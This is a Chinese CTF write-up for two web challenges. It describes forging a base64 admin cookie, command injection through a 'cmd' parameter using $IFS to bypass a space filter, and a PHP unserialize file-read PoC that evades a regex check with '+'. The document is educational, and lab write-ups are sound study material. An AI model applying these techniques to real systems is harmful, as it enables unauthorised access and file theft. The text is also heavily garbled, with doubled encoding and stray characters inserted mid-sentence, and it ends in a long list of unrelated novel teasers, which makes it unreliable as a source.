安恒杯12月WEB-writeup

ezweb2

掃描目錄邪乍，發(fā)現(xiàn)admin.php降狠，提示不是admin發(fā)現(xiàn)cookie有dXNlag%3D%3D的字樣，先url解碼dXNlag==庇楞，猜測(cè)base64

image

改成adminbase64編碼后進(jìn)入admin.php

image

,隨便輸入榜配，抓包發(fā)現(xiàn)變量名為cmd，猜測(cè)RCE

image

于是試了個(gè)ls /又提示error姐刁，經(jīng)過(guò)測(cè)試發(fā)現(xiàn)過(guò)濾了空格芥牌，可以用$IFS繞過(guò)。

image

讀取

image

easy

給了源碼

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

可以通過(guò)反序列化進(jìn)行任意文件讀取

<?php
class baby 
{   
    public $file = 'flag.php';
    function __toString()

    {          
        $this->file;    
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";
            print_r($filename);        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}

$baby = new baby();
$a = serialize($baby);
echo $a;

但是正則preg_match('/[oc]:\d+:/i',$data,$matches);waf掉了[oc]:數(shù)字聂使。在四前面加%2B就可以了壁拉，也就是+

image

最后編輯于：2018.12.24 17:51:14

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市柏靶，隨后出現(xiàn)的幾起案子弃理，更是在濱河造成了極大的恐慌，老刑警劉巖屎蜓，帶你破解...
沈念sama閱讀 206,378評(píng)論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件痘昌，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡，警方通過(guò)查閱死者的電腦和手機(jī)辆苔，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,356評(píng)論 2贊 382
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門(mén)算灸，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)，“玉大人驻啤，你說(shuō)我怎么就攤上這事菲驴。” “怎么了骑冗？”我有些...
開(kāi)封第一講書(shū)人閱讀 152,702評(píng)論 0贊 342
道士緝兇錄：失蹤的賣(mài)姜人
文/不壞的土叔我叫張陵赊瞬，是天一觀的道長(zhǎng)。經(jīng)常有香客問(wèn)我贼涩，道長(zhǎng)巧涧，這世上最難降的妖魔是什么？我笑而不...
開(kāi)封第一講書(shū)人閱讀 55,259評(píng)論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任遥倦，我火速辦了婚禮谤绳，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘谊迄。我一直安慰自己闷供，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 64,263評(píng)論 5贊 371
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布统诺。她就那樣靜靜地躺著，像睡著了一般疑俭。火紅的嫁衣襯著肌膚如雪粮呢。梳的紋絲不亂的頭發(fā)上，一...
開(kāi)封第一講書(shū)人閱讀 49,036評(píng)論 1贊 285
城市分裂傳說(shuō)
那天钞艇，我揣著相機(jī)與錄音啄寡，去河邊找鬼。笑死哩照，一個(gè)胖子當(dāng)著我的面吹牛挺物，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播飘弧，決...
沈念sama閱讀 38,349評(píng)論 3贊 400
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼识藤，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼！你這毒婦竟也來(lái)了次伶？” 一聲冷哼從身側(cè)響起痴昧，我...
開(kāi)封第一講書(shū)人閱讀 36,979評(píng)論 0贊 259
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎冠王，沒(méi)想到半個(gè)月后赶撰，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 43,469評(píng)論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 35,938評(píng)論 2贊 323
?白月光啟示錄
正文我和宋清朗相戀三年豪娜，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了餐胀。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 38,059評(píng)論 1贊 333
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡瘤载，死狀恐怖否灾，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情惕虑，我是刑警寧澤坟冲，帶...
沈念sama閱讀 33,703評(píng)論 4贊 323
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站溃蔫，受9級(jí)特大地震影響健提，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜伟叛，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,257評(píng)論 3贊 307
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一私痹、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧统刮，春花似錦紊遵、人聲如沸。這莊子的主人今日做“春日...
開(kāi)封第一講書(shū)人閱讀 30,262評(píng)論 0贊 19
一樁弒父案暗膜，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)。三九已至鞭衩，卻和暖如春学搜，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背论衍。一陣腳步聲響...
開(kāi)封第一講書(shū)人閱讀 31,485評(píng)論 1贊 262
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工瑞佩，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人坯台。一個(gè)月前我還...
沈念sama閱讀 45,501評(píng)論 2贊 354
代替公主和親
正文我出身青樓炬丸，卻偏偏與公主長(zhǎng)得像，于是被迫代替她去往敵國(guó)和親蜒蕾。傳聞我的和親對(duì)象是個(gè)殘疾皇子稠炬，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,792評(píng)論 2贊 345

安恒杯12月WEB-writeup

ezweb2

easy

推薦閱讀更多精彩內(nèi)容